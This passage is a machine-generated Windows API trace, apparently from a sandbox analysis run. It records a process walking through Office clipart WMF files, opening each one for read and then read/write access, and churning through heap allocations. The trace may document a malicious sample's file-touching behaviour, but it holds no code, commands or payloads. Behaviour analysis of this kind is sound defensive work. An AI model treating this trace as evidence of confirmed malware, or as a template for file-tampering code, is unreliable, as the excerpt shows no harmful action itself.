ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7992, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00117_.WMF", cAlternateFileName="")) returned 1 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0103.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0103.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0103.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.783] AreFileApisANSI () returned 1 [0103.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.783] AreFileApisANSI () returned 1 [0103.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 69 [0103.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.784] GetFileType (hFile=0x368) returned 0x1 [0103.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.784] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.784] CloseHandle (hObject=0x368) returned 1 [0103.784] AreFileApisANSI () returned 1 [0103.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 69 [0103.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.785] GetFileType (hFile=0x368) returned 0x1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.785] CloseHandle (hObject=0x368) returned 1 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.786] AreFileApisANSI () returned 1 [0103.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0103.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 69 [0103.786] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7992)) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00121_.WMF", cAlternateFileName="")) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.788] AreFileApisANSI () returned 1 [0103.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.788] AreFileApisANSI () returned 1 [0103.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0103.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 69 [0103.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.886] GetFileType (hFile=0x368) returned 0x1 [0103.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0103.887] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.887] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.887] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.887] CloseHandle (hObject=0x368) returned 1 [0103.887] AreFileApisANSI () returned 1 [0103.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0103.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 69 [0103.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.888] GetFileType (hFile=0x368) returned 0x1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0103.888] CloseHandle (hObject=0x368) returned 1 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.889] AreFileApisANSI () returned 1 [0103.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.889] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, 